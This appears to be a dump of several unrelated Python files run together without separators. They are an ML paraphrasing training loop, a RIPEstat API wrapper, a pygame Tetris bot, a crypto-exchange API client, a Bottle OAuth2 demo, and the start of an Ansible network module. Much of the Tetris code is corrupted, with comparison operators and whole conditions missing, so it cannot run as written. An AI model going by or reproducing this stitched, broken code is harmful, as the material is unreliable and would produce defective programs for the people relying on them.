self._get_tf_ratio(iteration), iteration) for key, val in self.summary_dict.items(): if not isinstance(val, list): writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration) self.summary_dict[key] = 0.0 elif len(val) == 0: continue elif not isinstance(val[0], list): writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration) self.summary_dict[key] = list() else: val = [v for sublist in val for v in sublist] if len(val) == 0: continue writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration) self.summary_dict[key] = list() class ContextAwareParaphrasingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets): super(ContextAwareParaphrasingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="ContextAwareParaphrasing" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.KL_scheduler = create_KLScheduler(scheduler_type = get_param_val(model_params, "VAE_scheduler", 1), annealing_func_type = get_param_val(model_params, "VAE_annealing_func", 0), loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0), num_iters = get_param_val(model_params, "VAE_annealing_iters", 10000)) self.cosine_loss_scaling = get_param_val(model_params, "cosine_loss_scaling", 0.0) self.switch_rate = get_param_val(model_params, "switch_rate", 0.8) self.summary_dict = {"loss_rec": list(), "loss_cosine": list(), "loss_VAE": list(), "KL_scheduler": list(), "loss_combined": list(), "style_mu": list(), "style_sigma": list()} def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) self.gen_batch = self.val_dataset.get_random_batch(16 if not self.debug else 2, toTorch=False, label_lengths=True, noun_mask=False, mask_prob=0.0) self.val_dataset.reset_index() self.id2word = get_id2word_dict() self.generated_before = False def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." 
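        # The contextless paraphrasing objective assembled below combines three terms
        # (names follow the variables used in this method):
        #   final_loss = (loss_1 + loss_2) / 2                                        # token reconstruction of both paraphrases
        #              + KL_scheduler(iteration) * (loss_VAE_1 + loss_VAE_2) / 2      # VAE/KL regularizer on the style variables
        #              + cosine_loss_scaling * mean(1 - cos(par_semantics[0], par_semantics[1]))  # pulls the two semantic encodings together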
_, _, par_1_words, par_1_lengths, par_2_words, par_2_lengths = self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True) par_1_words = par_1_words[DATA_GLOVE] par_1_lengths = par_1_lengths[DATA_GLOVE] current_tf_ratio = self._get_tf_ratio(iteration) par_1_res, par_2_res, par_1_style, par_2_style, par_semantics = self.model.contextless_paraphrasing(_input = (par_1_words, par_1_lengths, par_2_words, par_2_lengths, None, None, None, None), teacher_forcing = True, teacher_forcing_ratio = current_tf_ratio, switch_rate = self.switch_rate) loss_1, loss_VAE_1, acc_1 = self._calculate_loss(par_1_res, par_1_words, par_1_style) loss_2, loss_VAE_2, acc_2 = self._calculate_loss(par_2_res, par_2_words, par_2_style) loss = (loss_1 + loss_2) / 2.0 loss_VAE = (loss_VAE_1 + loss_VAE_2) / 2.0 loss_cos = (1 - F.cosine_similarity(par_semantics[0], par_semantics[1], dim=-1)).mean() acc = (acc_1 + acc_2) / 2.0 final_loss = loss + loss_VAE * self.KL_scheduler.get(iteration) + loss_cos * self.cosine_loss_scaling self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_cosine"].append(loss_cos.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["KL_scheduler"] = [self.KL_scheduler.get(iteration)] self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["style_mu", "style_sigma"], [[par_1_style[1], par_2_style[1]], [par_1_style[2], par_2_style[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors if t is not None] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, par_style): par_word_dist, slot_dist, _, _ = par_res # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] else: print("[#] WARNING: Batch labels were not shortend. 
First token ids: \n%s \nSOS index: %i" % (str(batch_labels[:,0]), get_SOS_index())) unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels < 0)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() ## Loss VAE regularization _, style_mu, style_std = par_style loss_VAE = ContextAwareDialogueTask._calc_loss_VAE(style_mu, style_std) return loss, loss_VAE, acc def _eval_batch(self, batch, use_context_style=False): _, _, par_1_words, par_1_lengths, par_2_words, par_2_lengths = batch par_1_words = par_1_words[DATA_GLOVE] par_1_lengths = par_1_lengths[DATA_GLOVE] eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) p1_res, p2_res, _, _, _ = self.model.contextless_paraphrasing(_input = (par_1_words, par_1_lengths, par_2_words, par_2_lengths, None, None, None, None), teacher_forcing = True, teacher_forcing_ratio = 1.0, switch_rate = eval_swr) p1_perplexity_probs, _, _, _ = p1_res p2_perplexity_probs, _, _, _ = p2_res p1_res_tf, p2_res_tf, _, _, _ = self.model.contextless_paraphrasing(_input = (par_1_words, par_1_lengths, par_2_words, par_2_lengths, None, None, None, None), teacher_forcing = False, teacher_forcing_ratio = 0.0, switch_rate = eval_swr) _, _, p1_generated_words, p1_generated_lengths = p1_res_tf _, _, p2_generated_words, p2_generated_lengths = p2_res_tf p1_perplexity_probs = p1_perplexity_probs.detach() p1_generated_words = p1_generated_words.detach() p1_generated_lengths = p1_generated_lengths.detach() p2_perplexity_probs = p2_perplexity_probs.detach() p2_generated_words = p2_generated_words.detach() p2_generated_lengths = p2_generated_lengths.detach() # Remove unknown word labels from the evaluation batch_labels = par_1_words if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels == -1)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label return batch_labels, p1_perplexity_probs, p1_generated_words, p1_generated_lengths def eval(self, dataset=None, batch_size=64): # Default: if no dataset is specified, we use validation dataset if dataset is None: assert self.val_dataset is not None, "[!] ERROR: Validation dataset not loaded. Please load the dataset beforehand for evaluation." 
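        # The evaluation loop below decodes the dataset batch-wise and aggregates sentence-level
        # perplexity (mean and median), corpus BLEU with per-n-gram precisions, ROUGE, and
        # diversity statistics (distinct unigrams/bigrams and their entropy) for both the
        # generated hypotheses and the ground-truth references.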
dataset = self.val_dataset self.model.eval() if not self.debug: batch_size = 128 # Prepare metrics number_batches = int(math.ceil(dataset.get_num_examples() * 1.0 / batch_size)) if self.debug: number_batches = min(8, number_batches) perplexity = [] hypotheses, references = None, None # Evaluation loop for batch_ind in range(number_batches): if debug_level() == 0: print("Evaluation process: %4.2f%% (batch %i of %i)" % (100.0 * batch_ind / number_batches, batch_ind+1, number_batches), end="\r") # Evaluate single batch with torch.no_grad(): batch = dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=True, noun_mask=False, mask_prob=0.0) batch_labels, perplexity_logits, generated_words, generated_lengths = self._eval_batch(batch) # Perplexity calculation perplexity += TaskTemplate._eval_preplexity(perplexity_logits, batch_labels).cpu().numpy().tolist() hypotheses, references = add_if_not_none(TaskTemplate._preds_to_sents(batch_labels, generated_words, generated_lengths), (hypotheses, references)) BLEU_score, prec_per_ngram = get_BLEU_score(hypotheses, references) ROUGE_score = get_ROUGE_score(hypotheses, references) # Metric output avg_perplexity = sum(perplexity) / len(perplexity) median_perplexity = median(perplexity) unigram_variety, unigram_entropy = get_diversity_measure(hypotheses, n_gram=1) bigram_variety, bigram_entropy = get_diversity_measure(hypotheses, n_gram=2) unigram_variety_gt, unigram_entropy_gt = get_diversity_measure(references, n_gram=1) bigram_variety_gt, bigram_entropy_gt = get_diversity_measure(references, n_gram=2) detailed_metrics = { "perplexity": avg_perplexity, "perplexity_median": median_perplexity, "diversity_unigram_entropy": unigram_entropy, "diversity_bigram_entropy": bigram_entropy, "diversity_unigram": unigram_variety, "diversity_bigram": bigram_variety, "diversity_unigram_entropy_gt": unigram_entropy_gt, "diversity_bigram_entropy_gt": bigram_entropy_gt, "diversity_unigram_gt": unigram_variety_gt, "diversity_bigram_gt": bigram_variety_gt, "BLEU": BLEU_score } for n in range(len(prec_per_ngram)): detailed_metrics["BLEU_%i-gram" % (n+1)] = float(prec_per_ngram[n]) for metric, results in ROUGE_score.items(): if metric[-1] in ["1", "2", "3", "4"]: continue for sub_category, val in results.items(): detailed_metrics[metric + "_" + sub_category] = val self.model.train() dataset.reset_index() return BLEU_score, detailed_metrics def add_summary(self, writer, iteration): # TODO: Add some example generations here. 
        # Either run the model again for some random sentences, or save the last training sentences.
        writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), self._get_tf_ratio(iteration), iteration)
        for key, val in self.summary_dict.items():
            if not isinstance(val, list):
                writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration)
                self.summary_dict[key] = 0.0
            elif len(val) == 0:
                continue
            elif not isinstance(val[0], list):
                writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration)
                self.summary_dict[key] = list()
            else:
                val = [v for sublist in val for v in sublist]
                if len(val) == 0:
                    continue
                writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration)
                self.summary_dict[key] = list()
        if self.debug or iteration % 1000 == 0:
            gen_list = self.generate_random_style_samples()
            for i in range(len(gen_list)):
                if not self.generated_before:
                    writer.add_text(self.name + "_samp%i_input_phrase" % (i), gen_list[i][0], iteration)
                for j in range(len(gen_list[i][1])):
                    writer.add_text(self.name + "_samp%i_sample_%i" % (i, j), gen_list[i][1][j], iteration)
            self.generated_before = True

    def generate_random_style_samples(self):
        self.model.eval()
        # 1.) Put data on GPU
        batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch)
        _, _, par_words, par_lengths, _, _ = batch_torch
        par_words = par_words[DATA_GLOVE]
        par_lengths = par_lengths[DATA_GLOVE]
        par_masks = self.model.embedding_module.generate_mask(par_words)
        with torch.no_grad():
            _, _, gen_par_words, gen_par_lengths = self.model.sample_reconstruction_styles((par_words, par_lengths, par_masks, None, None), num_samples=12)
        del batch_torch
        # 3.) Reconstruct generated answer and input
        generated_paraphrases = list()
        input_phrases = list()
        gen_par_words = gen_par_words.cpu().numpy()
        gen_par_lengths = gen_par_lengths.cpu().numpy()
        par_words = self.gen_batch[2][DATA_GLOVE]
        par_lengths = self.gen_batch[3][DATA_GLOVE]
        for embeds, lengths, list_to_add, add_sents_up in zip([par_words, gen_par_words], [par_lengths, gen_par_lengths], [input_phrases, generated_paraphrases], [True, False]):
            reconstruct_sentences(embeds, lengths, list_to_add=list_to_add, add_sents_up=add_sents_up)
        # 5.) Put everything in a nice format
        gen_list = list(zip(input_phrases, generated_paraphrases))
        self.model.train()
        return gen_list


"""Provide the RIPEstat class."""
from functools import partial
from typing import Optional, Type

from .api import get
from .stat.abuse_contact_finder import AbuseContactFinder
from .stat.announced_prefixes import AnnouncedPrefixes
from .stat.asn_neighbours import ASNNeighbours
from .stat.looking_glass import LookingGlass
from .stat.network_info import NetworkInfo
from .stat.ris_peers import RISPeers
from .stat.rpki_validation_status import RPKIValidationStatus
from .stat.whats_my_ip import WhatsMyIp


class RIPEstat:
    """
    The RIPEstat class provides a convenient way to access the RIPEstat public API.

    Instances of this class are the gateway to interacting with RIPE's stat API
    through PRSW. **If you have a `sourceapp` parameter from RIPE, see `__init__`
    documentation for details.**

    .. code-block:: python

        import prsw

        ripe = prsw.RIPEstat()

    """

    def __init__(
        self, data_overload_limit: Optional[str] = "", sourceapp: Optional[str] = ""
    ) -> None:
        """
        Initialize a RIPEstat instance.

        :param data_overload_limit: Override the soft-limit check
            (see `data_overload_limit()`)
        :param sourceapp: A unique identifier attached to API calls. This identifier
            helps RIPE assist you when you encounter any problems with the system.
The identifier can be your project name or your company's. See `RIPEstat API Overview `_ for details. """ self.sourceapp = sourceapp self.data_overload_limit = data_overload_limit return @property def data_overload_limit(self) -> str: """ The data overload prevention is to protect users, especially widgets, from getting more data than they can handle. For this reason some data calls already support a soft-limit check which returns a warning if the output looks to be more than usual. This prevention mechanism should only kick in if the request stems from a browser (the referrer header set), but in case it happens for a non-browser request, it can easily suppressed by the "data_overload_limit" parameter set to "ignore". """ return self._data_overload_limit @data_overload_limit.setter def data_overload_limit(self, string): if string == "ignore" or string == "": self._data_overload_limit = string else: raise ValueError("data_overload_limit expected 'ignore' or blank string") def _get(self, path, params=None): """Retrieve the requested path with parameters as GET from the API.""" params = {} if params is None else params if self.data_overload_limit: params["data_overload_limit"] = "ignore" if self.sourceapp: params["sourceapp"] = self.sourceapp return get(path, params) @property def abuse_contact_finder(self) -> Type[AbuseContactFinder]: """Lazy alias to :class:`.stat.AbuseContactFinder`.""" return partial(AbuseContactFinder, self) @property def announced_prefixes(self) -> Type[AnnouncedPrefixes]: """Lazy alias to :class:`.stat.AnnouncedPrefixes`.""" return partial(AnnouncedPrefixes, self) @property def asn_neighbours(self) -> Type[ASNNeighbours]: """Lazy alias to :class:`.stat.ASNNeighbours`.""" return partial(ASNNeighbours, self) @property def looking_glass(self) -> Type[LookingGlass]: """Lazy alias to :class:`.stat.LookingGlass`.""" return partial(LookingGlass, self) @property def network_info(self) -> Type[NetworkInfo]: """Lazy alias to :class:`.stat.NetworkInfo`.""" return partial(NetworkInfo, self) @property def ris_peers(self) -> Type[RISPeers]: """Lazy alias to :class:`.stat.RISPeers`.""" return partial(RISPeers, self) @property def rpki_validation_status(self) -> Type[RPKIValidationStatus]: """Lazy alias to :class:`.stat.RPKIValidationStatus`.""" return partial(RPKIValidationStatus, self) @property def whats_my_ip(self) -> Type[WhatsMyIp]: """Laze alias to :class:`.stat.WhatsMyIp`.""" return partial(WhatsMyIp, self) from random import randrange,shuffle from math import floor from statistics import mean,stdev import time import pygame from pygame.locals import * #dimensions of the game grid dimx=10 dimy=20 #colors corresponding to specific pieces colorshape={"line":(0,255,255),"l":(0,0,255),"li":(255,125,0),"z":(255,0,0),"zi":(0,255,0),"square":(255,255,0),"t":(255,0,255)} #setting up the arrays gamegrid=[] shapes=[] for i in range(0,dimy): gamegrid.append([]) shapes.append([]) for j in range(0,dimx): gamegrid[i].append(0) shapes[i].append(0) #class for each shape class Shape: def __init__(self,shape): self.shape=shape mid=floor(dimx/2) #start positions of each piece of the shape based on type if self.shape=="line": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid+1,1];self.d=[mid+2,1];self.e=[mid+1,1] elif self.shape=="t": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid,0];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="l": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid+1,1];self.d=[mid+1,0];self.e=[mid,1] elif self.shape=="li": 
self.a=[mid-1,0];self.b=[mid-1,1];self.c=[mid,1];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="square": self.a=[mid,0];self.b=[mid+1,0];self.c=[mid,1];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="z": self.a=[mid-1,0];self.b=[mid,0];self.c=[mid,1];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="zi": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid,0];self.d=[mid+1,0];self.e=[mid,1] self.pieces=[self.a,self.b,self.c,self.d] #rotates the pieces clockwise def rotate(self): #square pieces don't rotate if self.shape=="square": pass #line pieces have special rotation elif self.shape=="line": if self.a[1]==self.b[1]: if self.a[0]+2=0 and self.d[0]-1>=0: self.a[0]+=2;self.a[1]+=1;self.b[0]+=1;self.c[1]-=1;self.d[0]-=1;self.d[1]-=2 else: if self.a[0]-2>=0 and self.b[0]-1>=0 and self.c[1]+1=0 and (self.e[0]-(i[1]-self.e[1]))0: return for j in range(0,dimy): for k in range(0,dimx): if Tetris.shapes[j][k]!=0 and j==i[1] and k==i[0]-1: return for i in self.pieces: i[0]-=1 self.e[0]-=1 #moves the shape right def moveright(self): for i in self.pieces: if not i[0]=0 and i<=dimy: #displays the shapes already in the grid if self.shapes[i][j]!=0: pygame.draw.rect(screen,colorshape[self.shapes[i][j]],(50+j*25,50+i*25,25,25)) #displays the current shape elif self.grid[i][j]==1: pygame.draw.rect(screen,colorshape[self.shape],(50+j*25,50+i*25,25,25)) else: pygame.draw.rect(screen,(25,25,25),(51+j*25,51+i*25,23,23)) #checks if a certain move will score points def checkScore(self): gn=0 for k in range(0,dimy): gm=0 for j in range(0,dimx): if self.tshapes[k][j]!=0: gm+=1 if gm==dimx: gn+=1 self.incscore=gn #checks if a certain move will add holes def checkHoles(self): for i in range(0,dimx): for j in range(0,dimy): if self.tshapes[j][i]==0 and self.tshapes[j-1][i]!=0: self.holes+=1 #checks the height of each column def getHeights(self): for i in range(0,dimx): self.heights.append(0) for j in range(dimy-1,0,-1): if self.tshapes[j][i]!=0: self.heights[i]=dimy-j #goes through all possible moves to find the best one based on amount of holes, heights of columns, etc. 
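# NOTE (illustrative sketch): parsemoves() below scores every reachable placement
# with a weighted sum of aggregate column height, cleared lines, holes and
# bumpiness (the class keeps its multipliers in attributes such as holemult and
# agghmult, whose values are not shown here). A standalone version of that
# evaluation, with purely illustrative weights, looks roughly like this:
def evaluate_placement(heights, holes, lines_cleared,
                       w_agg_height=-0.5, w_lines=0.75, w_holes=-0.35, w_bumpiness=-0.2):
    """Score a candidate Tetris placement; higher is better.
    `heights` is the per-column stack height after the piece has been dropped."""
    aggregate_height = sum(heights)
    bumpiness = sum(abs(heights[i] - heights[i + 1]) for i in range(len(heights) - 1))
    return (w_agg_height * aggregate_height
            + w_lines * lines_cleared
            + w_holes * holes
            + w_bumpiness * bumpiness)

# The chosen move is then simply the placement with the maximal score, mirroring
# max(self.values) in parsemoves() below.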
def parsemoves(self,theshape): self.possible=[] self.getto=[] if theshape=="line": ii=2 elif theshape=="square": ii=1 else: ii=4 #goes through every move and add it to a list for ii in range(0,4): for j in range(0,11): self.test=Shape(theshape) for k in range(0,ii): self.test.rotate() if j<7: for k in range(0,j): self.test.moveleft() else: for k in range(0,j-6): self.test.moveright() self.test.harddrop() for k in self.test.pieces: k[1]-=1 self.possible.append(self.test.pieces) if j<7: self.getto.append([ii,j,True]) else: self.getto.append([ii,j-6,False]) self.values=[] self.tshapes=[] self.check=[] #finds the value of each possible move for ii in range(0,len(self.possible)): self.tshapes=self.shapes.copy() self.nnn=[] for jj in range(0,len(self.possible[ii])): self.tshapes[self.possible[ii][jj][1]][self.possible[ii][jj][0]]=theshape #attributes that determine the best move self.holes=0 self.bumpiness=0 self.heights=[] self.incscore=0 self.aggheight=0 self.maxheight=0 self.getHeights() self.checkHoles() self.checkScore() self.aggheight=sum(self.heights) self.maxheight=max(self.heights) for i in range(0,len(self.heights)-1): self.bumpiness+=abs(self.heights[i]-self.heights[i+1]) #adding together the attributes self.values.append(self.maxhmult*self.maxheight+self.scoremult*self.incscore+self.bumpymult*self.bumpiness+self.holemult*self.holes+self.agghmult*self.aggheight) for jj in range(0,len(self.possible[ii])): self.tshapes[self.possible[ii][jj][1]][self.possible[ii][jj][0]]=0 #finds the best possible move based on the values return max(self.values),self.getto[self.values.index(max(self.values))] def choosemove(self): #lll=[0,0];ooo=[0,0] #lll[0],ooo[0]=self.parsemoves(self.shape) #lll[1],ooo[1]=self.parsemoves(self.held.shape) #if lll[0]>=lll[1]: # ooo=ooo[0] #elif lll[1]>lll[0]: # ooo=ooo[1] # self.holdshape() o,oo=self.parsemoves(self.shape) for i in range(0,oo[0]): self.s.rotate() for i in range(0,oo[1]): if oo[2]==True: self.s.moveleft() else: self.s.moveright() self.s.harddrop() self.prtscr() self.checkend() self.clearlines() self.prtscr() #creates a new shape def newshape(self): self.shape=self.shapenum[self.shapez] if self.shapez==6: shuffle(self.shapenum) self.shapez=-1 self.s=Shape(self.shape) self.nextp=Shape(self.shapenum[self.shapez+1]) self.shapez+=1 #holds the current shape and brings the held shape into play def holdshape(self): if self.held=="": self.held=Shape(self.shape) self.newshape() #will hold only if you haven't already held a shape this round elif self.heldal==0: hshape=self.held.shape self.held=Shape(self.shape) self.shape=hshape self.s=Shape(self.shape) self.heldal=1 #clears a line if it's filled in all the way horizontally def clearlines(self): n=0 for i in range(0,dimy): m=0 for j in range(0,dimx): if self.shapes[i][j]!=0: m+=1 if m==dimx: n+=1 #clears pieces for j in range(0,dimx): self.shapes[i][j]==0 #brings pieces above the cleared line down for h in range(i,0,-1): for j in range(0,dimx): self.shapes[h][j]=self.shapes[h-1][j] #updates score based on how many lines have been cleared this round if n==1: self.score+=100 elif n==2: self.score+=300 elif n==3: self.score+=500 elif n==4: self.score+=800 self.linescl+=n #checks if the current piece is at the bottom of the screen or has hit a piece already in the grid def checkend(self): for j in range(0,dimy): for k in range(0,dimx): for i in self.pieces: #locks the shape in and creates a new shape if self.shapes[j][k]!=0 and j==i[1] and k==i[0]: for l in self.pieces: l[1]-=1 self.shapes[l[1]][l[0]]=self.shape 
self.heldal=0;self.score+=10 self.newshape() return for i in self.pieces: #locks the shape in and creates a new shape if i[1]>dimy-1: for k in self.pieces: self.shapes[k[1]-1][k[0]]=self.shape self.heldal=0;self.score+=10 self.newshape() return #the main loop for the bame def gameloop(self): self.pieces=[self.s.a,self.s.b,self.s.c,self.s.d] self.choosemove() #self.checkend() #self.clearlines() #updates the grid based on the position of the shapes in the grid for i in range(0,dimy): for j in range(0,dimx): if self.shapes[i][j]==0: self.grid[i][j]=0 else: self.grid[i][j]=1 #updates the grid based on the position of the current shape for i in self.pieces: if i[1]0) or (frac<0.75 and frac>0.5): screen.blit(starttext,(60,150)) pygame.display.flip() #game loop for pygame to run the game and check user input while Tetris.running: screen.fill((0,0,0)) for i in pygame.event.get(): #quits game if exit button is pressed if i.type==pygame.QUIT: Tetris.running=False pygame.quit() quit() if i.type==pygame.KEYDOWN and i.key==pygame.K_x: Tetris.choosemove() #moves the piece down every certain amount of time #elif i.type==MOVE1: #Tetris.s.movedown() #Tetris.prtscr() Tetris.gameloop() Tetris.prtscr() pygame.display.flip() marciks/python-3xbit # coding=utf-8 from .enums import * from requests import get, post import time class api3xbit: def __init__(self, client_id, client_secret): self.__base_url = PUBLIC_BASE_URL self.__client_id = client_id self.__client_secret = client_secret self.access_token = None def auth(self): endpoint = "/api/oauth/token/" data = { 'grant_type': 'client_credentials', 'client_id': self.__client_id, 'client_secret': self.__client_secret } time.sleep(RATE_LIMITER) r = post(self.__base_url+endpoint, data=data) return r.json() def balance(self, currency=None): while True: if currency: endpoint = "/v1/balance/{}".format(currency) else: endpoint = "/v1/balance/" headers = { "Authorization": "Bearer {}".format(self.access_token)} r = get(self.__base_url+endpoint, headers=headers) if r.status_code == 403: time.sleep(RATE_LIMITER) self.access_token = self.auth()["access_token"] continue return r.json() def tickers(self, conversion=None): if conversion: endpoint = "/ticker/{0}/".format(conversion) else: endpoint = "/ticker/" r = get(self.__base_url+endpoint) return r.json() def orderbook(self, primary_pair, second_pair): while True: endpoint = "/v1/orderbook/{}/{}/".format(primary_pair, second_pair) headers = { "Authorization": "Bearer {}".format(self.access_token)} r = get(self.__base_url+endpoint, headers=headers) if r.status_code == 403: time.sleep(RATE_LIMITER) self.access_token = self.auth()["access_token"] continue return r.json() print() #logging.basicConfig(level=logging.ERROR) api = api3xbit(API_KEYS["client_id"], API_KEYS["client_secret"]) pusher = pysher.Pusher(cluster="us2", key="") orderbooks = defaultdict(dict) def main(): def created(data): data = json.loads(data) orderbooks[str(data["unit_price"]["currency"])+"_"+str(data["remaining"]["currency"])][data["order_id"]] = data def done(data): data = json.loads(data) if data["unit_price"]["currency"]+"_"+data["remaining"]["currency"] in orderbooks: if data["order_id"] in orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]]: orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]].pop(data["order_id"], None) def updated(data): data = json.loads(data) orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]][data["order_id"]] = data def deleted(data): data = 
json.loads(data) if data["unit_price"]["currency"]+"_"+data["remaining"]["currency"] in orderbooks: if data["order_id"] in orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]]: orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]].pop(data["order_id"], None) # We can't subscribe until we've connected, so we use a callback handler # to subscribe when able def connect_handler(data): #channel1 = pusher.subscribe('BRL-orderbook-history') #channel2 = pusher.subscribe('BRL-user-channel-531') sellChanell = pusher.subscribe('BRL-orderbook-sell') buyChannel = pusher.subscribe('BRL-orderbook-buy') sellChanell.bind('created', created) sellChanell.bind('deleted', deleted) sellChanell.bind('updated', updated) sellChanell.bind('done', done) buyChannel.bind('created', created) buyChannel.bind('deleted', deleted) buyChannel.bind('updated', updated) buyChannel.bind('done', done) pusher.connection.bind('pusher:connection_established', connect_handler) pusher.connect() kpdemetriou/uclif from bottle import get, run, request, response, redirect, template from bottle import HTTPError from datetime import datetime from UCLIFAuth import UCLIFAuthConfidential, UCLIF_JWT_KEY, UCLIF_AUTH_ENDPOINT, UCLIF_TOKEN_ENDPOINT from config import * import json @get("/") def route_root(): return template("sso") @get("/sso") def route_sso(): try: ucl_auth = UCLIFAuthConfidential(OAUTH2_CLIENT_ID, OAUTH2_CLIENT_SECRET, OAUTH2_REDIRECT_URI) auth_url, state = ucl_auth.url(*OAUTH2_SCOPE_TOKENS) except ValueError: return HTTPError(500, "Internal server error.") response.set_cookie("state", state) return redirect(auth_url, 302) @get("/info") def route_info(): param_code = request.params.get("code", None) param_state = request.params.get("state", None) cookie_state = request.get_cookie("state", None) response.set_cookie("state", "", expires=0) if not param_code: return HTTPError(400, "Missing code parameter.") if not param_state: return HTTPError(400, "Missing state parameter.") if not cookie_state: return HTTPError(400, "Missing state cookie.") try: ucl_auth = UCLIFAuthConfidential(OAUTH2_CLIENT_ID, OAUTH2_CLIENT_SECRET, OAUTH2_REDIRECT_URI) except ValueError: return HTTPError(500, "Internal server error.") try: token_type, expires_in, token = ucl_auth.code(param_code, param_state, cookie_state) except ValueError: return HTTPError(400, "Token acquisition or validation failed.") info_oauth2_state = param_state info_oauth2_code = param_code info_oauth2_token_type = token_type info_oauth2_expires_in = expires_in info_oauth2_client_id = OAUTH2_CLIENT_ID info_oauth2_client_secret = "*" * len(OAUTH2_CLIENT_SECRET) info_oauth2_redirect_uri = OAUTH2_REDIRECT_URI info_oauth2_auth_endpoint = UCLIF_AUTH_ENDPOINT info_oauth2_token_endpoint = UCLIF_TOKEN_ENDPOINT info_jwt_iss = token.get("iss", "") info_jwt_aud = token.get("aud", "") info_jwt_exp = datetime.fromtimestamp(token.get("exp", 0)).strftime("%Y-%m-%d %H:%M:%S") info_jwt_nbf = datetime.fromtimestamp(token.get("nbf", 0)).strftime("%Y-%m-%d %H:%M:%S") info_jwt_iat = datetime.fromtimestamp(token.get("iat", 0)).strftime("%Y-%m-%d %H:%M:%S") info_jwt_jti = token.get("jti", "") info_pre_key = UCLIF_JWT_KEY.strip() info_pre_jwt = json.dumps(token, indent=4) return template( "info", info_oauth2_state=info_oauth2_state, info_oauth2_code=info_oauth2_code, info_oauth2_token_type=info_oauth2_token_type, info_oauth2_expires_in=info_oauth2_expires_in, info_oauth2_client_id=info_oauth2_client_id, info_oauth2_client_secret=info_oauth2_client_secret, 
info_oauth2_redirect_uri=info_oauth2_redirect_uri, info_oauth2_auth_endpoint=info_oauth2_auth_endpoint, info_oauth2_token_endpoint=info_oauth2_token_endpoint, info_jwt_iss=info_jwt_iss, info_jwt_aud=info_jwt_aud, info_jwt_exp=info_jwt_exp, info_jwt_nbf=info_jwt_nbf, info_jwt_iat=info_jwt_iat, info_jwt_jti=info_jwt_jti, info_pre_key=info_pre_key, info_pre_jwt=info_pre_jwt, ) run(server=HTTP_SERVER, host=HTTP_HOST, port=HTTP_PORT, debug=APP_DEBUG, reloader=APP_DEBUG) 1-10 # # -*- coding: utf-8 -*- # Copyright 2019 Red Hat # GNU General Public License v3.0+ # (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) """ The iosxr_lacp class It is in this file where the current configuration (as dict) is compared to the provided configuration (as dict) and the command set necessary to bring the current configuration to it's desired end-state is created """ from __future__ import absolute_import, division, print_function __metaclass__ = type from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.cfg.base import ( ConfigBase, ) from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ( to_list, ) from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.facts.facts import ( Facts, ) from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ( dict_diff, ) from ansible.module_utils.six import iteritems from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ( remove_empties, ) from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils import ( flatten_dict, ) class Lacp(ConfigBase): """ The iosxr_lacp class """ gather_subset = ["!all", "!min"] gather_network_resources = ["lacp"] def __init__(self, module): super(Lacp, self).__init__(module) def get_lacp_facts(self, data=None): """ Get the 'facts' (the current configuration) :rtype: A dictionary :returns: The current configuration as a dictionary """ facts, _warnings = Facts(self._module).get_facts( self.gather_subset, self.gather_network_resources, data=data ) lacp_facts = facts["ansible_network_resources"].get("lacp") if not lacp_facts: return 